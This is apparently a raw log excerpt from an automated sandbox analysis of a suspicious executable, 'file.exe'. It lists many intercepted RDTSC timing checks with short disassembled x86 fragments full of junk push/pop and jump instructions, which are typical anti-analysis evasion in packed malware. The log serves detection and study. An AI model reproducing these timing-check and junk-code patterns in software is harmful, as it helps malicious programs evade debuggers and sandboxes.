Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA44C9 second address: BA44D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BADE8A second address: BADEA4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FB8FCCA77C4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAD9EB second address: BAD9EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAD9EF second address: BADA11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCCA77BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jmp 00007FB8FCCA77BCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BADA11 second address: BADA4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jo 00007FB8FCD64876h 0x0000000f push esi 0x00000010 pop esi 0x00000011 jmp 00007FB8FCD6487Bh 0x00000016 popad 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007FB8FCD64889h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BADA4B second address: BADA50 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BADA50 second address: BADA76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8FCD64888h 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAE8BD second address: BAE8C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAE8C3 second address: BAE8C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAE8C8 second address: BAE8D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FB8FCCA77B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAE8D2 second address: BAE8F5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB8FCD64876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB8FCD64887h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAEA2E second address: BAEA34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAEA34 second address: BAEA49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FB8FCD6487Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAEA49 second address: BAEA55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FB8FCCA77B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAEA55 second address: BAEA59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAEA59 second address: BAEA73 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB8FCCA77B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FB8FCCA77B8h 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 pop eax 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB28D7 second address: BB28FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FB8FCD64876h 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FB8FCD6488Ch 0x00000012 jmp 00007FB8FCD64884h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB28FF second address: BB290A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FB8FCCA77B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB290A second address: BB2910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B268DC second address: B268E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B268E2 second address: B268E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB7B5A second address: BB7B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB6856 second address: BB6860 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB8FCD64882h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7819D second address: B781B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCCA77BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jns 00007FB8FCCA77BCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7829A second address: B782A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B782A0 second address: B782A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78434 second address: B78438 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78438 second address: B78441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B784A7 second address: B784AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B784AD second address: B784B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B784B5 second address: B784C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 jg 00007FB8FCD64880h 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B785B5 second address: B785BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78B20 second address: B78B64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FB8FCD6487Fh 0x0000000d nop 0x0000000e mov dword ptr [ebp+122D1AC9h], edi 0x00000014 push 0000001Eh 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007FB8FCD64878h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 nop 0x00000031 push eax 0x00000032 push edx 0x00000033 push esi 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78B64 second address: B78B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78B69 second address: B78BAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB8FCD64888h 0x00000008 jmp 00007FB8FCD64883h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push ecx 0x00000013 jmp 00007FB8FCD6487Ah 0x00000018 pop ecx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78ED4 second address: B78ED8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78ED8 second address: B78F4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007FB8FCD64878h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D1A28h], eax 0x00000028 lea eax, dword ptr [ebp+12489B7Eh] 0x0000002e push 00000000h 0x00000030 push esi 0x00000031 call 00007FB8FCD64878h 0x00000036 pop esi 0x00000037 mov dword ptr [esp+04h], esi 0x0000003b add dword ptr [esp+04h], 0000001Bh 0x00000043 inc esi 0x00000044 push esi 0x00000045 ret 0x00000046 pop esi 0x00000047 ret 0x00000048 add dword ptr [ebp+122D24A7h], eax 0x0000004e sbb dh, 00000073h 0x00000051 push eax 0x00000052 push ecx 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007FB8FCD64882h 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78F4E second address: B78F52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78F52 second address: B78FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FB8FCD64878h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 lea eax, dword ptr [ebp+12489B3Ah] 0x0000002a push 00000000h 0x0000002c push edi 0x0000002d call 00007FB8FCD64878h 0x00000032 pop edi 0x00000033 mov dword ptr [esp+04h], edi 0x00000037 add dword ptr [esp+04h], 0000001Bh 0x0000003f inc edi 0x00000040 push edi 0x00000041 ret 0x00000042 pop edi 0x00000043 ret 0x00000044 jg 00007FB8FCD6487Bh 0x0000004a cmc 0x0000004b push eax 0x0000004c ja 00007FB8FCD6487Eh 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78FB7 second address: B5739E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov dword ptr [esp], eax 0x00000008 clc 0x00000009 call dword ptr [ebp+122D36A9h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB8FCCA77C5h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB6ECD second address: BB6ED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB71B2 second address: BB71D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FB8FCCA77C7h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB7669 second address: BB766D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB9CC7 second address: BB9CCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB9CCD second address: BB9CD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBD278 second address: BBD2A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jbe 00007FB8FCCA77C2h 0x0000000d jp 00007FB8FCCA77B6h 0x00000013 ja 00007FB8FCCA77B6h 0x00000019 jo 00007FB8FCCA77BAh 0x0000001f pushad 0x00000020 popad 0x00000021 pushad 0x00000022 popad 0x00000023 js 00007FB8FCCA77D3h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBCB4C second address: BBCB5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FB8FCD6487Bh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBCF9F second address: BBCFB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB8FCCA77B6h 0x0000000a popad 0x0000000b push esi 0x0000000c jnp 00007FB8FCCA77B6h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC19EB second address: BC19F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC7A96 second address: BC7A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC7A9C second address: BC7AC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB8FCD6487Fh 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d jg 00007FB8FCD64876h 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jno 00007FB8FCD64876h 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC7AC4 second address: BC7AE3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB8FCCA77B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FB8FCCA77BFh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC7AE3 second address: BC7AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC7AE9 second address: BC7AF3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB8FCCA77B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC6827 second address: BC686D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB8FCD64881h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007FB8FCD64888h 0x00000013 push edx 0x00000014 pop edx 0x00000015 jmp 00007FB8FCD64880h 0x0000001a jp 00007FB8FCD64885h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC69DB second address: BC69E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FB8FCCA77B6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B789F2 second address: B78A0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCD64889h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78A0F second address: B78A16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78A16 second address: B78A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnp 00007FB8FCD64884h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC6CFB second address: BC6D07 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB8FCCA77B6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC6D07 second address: BC6D33 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB8FCD64883h 0x0000000d jmp 00007FB8FCD64881h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCB948 second address: BCB954 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FB8FCCA77B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCB954 second address: BCB958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCB958 second address: BCB95C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCB95C second address: BCB977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB8FCD64883h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCB977 second address: BCB97B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCB1BA second address: BCB1C0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCB1C0 second address: BCB1C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCB1C9 second address: BCB1DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB8FCD64876h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FB8FCD64876h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCB1DE second address: BCB1E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCB1E2 second address: BCB1F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007FB8FCD64876h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d je 00007FB8FCD64886h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCB1F9 second address: BCB1FF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD3BE7 second address: BD3C48 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB8FCD64876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007FB8FCD64883h 0x00000010 pop esi 0x00000011 pop edx 0x00000012 pushad 0x00000013 jmp 00007FB8FCD64881h 0x00000018 jg 00007FB8FCD64883h 0x0000001e jnl 00007FB8FCD6487Eh 0x00000024 pushad 0x00000025 jmp 00007FB8FCD6487Bh 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD1F61 second address: BD1F97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCCA77C5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FB8FCCA77C1h 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 jne 00007FB8FCCA77B6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD2548 second address: BD2561 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCD64883h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD2561 second address: BD2565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD2819 second address: BD283E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jne 00007FB8FCD64876h 0x0000000f jmp 00007FB8FCD6487Bh 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 popad 0x00000017 jnl 00007FB8FCD64878h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD2D5C second address: BD2D80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCCA77C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007FB8FCCA77B6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD3030 second address: BD3046 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCD6487Fh 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD38B2 second address: BD38B9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD38B9 second address: BD38C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD85DC second address: BD85E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD85E3 second address: BD85ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDB970 second address: BDB999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8FCCA77C9h 0x00000009 jne 00007FB8FCCA77B6h 0x0000000f popad 0x00000010 push edi 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDB999 second address: BDB9CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FB8FCD64888h 0x0000000a popad 0x0000000b pushad 0x0000000c jns 00007FB8FCD6487Ch 0x00000012 jbe 00007FB8FCD64882h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDB9CC second address: BDB9EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB8FCCA77B6h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jp 00007FB8FCCA77B6h 0x00000013 pushad 0x00000014 popad 0x00000015 push edx 0x00000016 pop edx 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b jc 00007FB8FCCA77B6h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDBB10 second address: BDBB14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDBB14 second address: BDBB18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
